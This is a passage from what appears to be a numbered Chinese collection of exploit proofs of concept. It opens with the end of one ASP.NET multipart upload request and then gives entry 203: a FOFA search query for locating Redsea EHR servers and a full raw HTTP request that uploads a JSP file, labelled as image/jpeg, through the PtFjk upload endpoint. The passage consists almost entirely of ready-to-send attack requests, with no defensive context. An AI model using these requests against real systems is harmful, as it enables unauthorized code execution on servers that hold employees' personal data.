__EVENTVALIDATION
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"
Content-Type: text/plain

Hello World!
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"

上传图片
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"


-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"


-----------------------------786435874t38587593865736587346567358735687--


/_data/Uploads/1123.txt

203. 红海云EHR PtFjk file upload
FOFA:body="RedseaPlatform"
POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1
Host: x.x.x.x
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Length: 210

------WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Disposition: form-data; name="fj_file"; filename="11.jsp"
Content-Type:image/jpeg

<% out.print("hello,eHR");%>
------WebKitFormBoundaryt7WbDl1tXogoZys4--
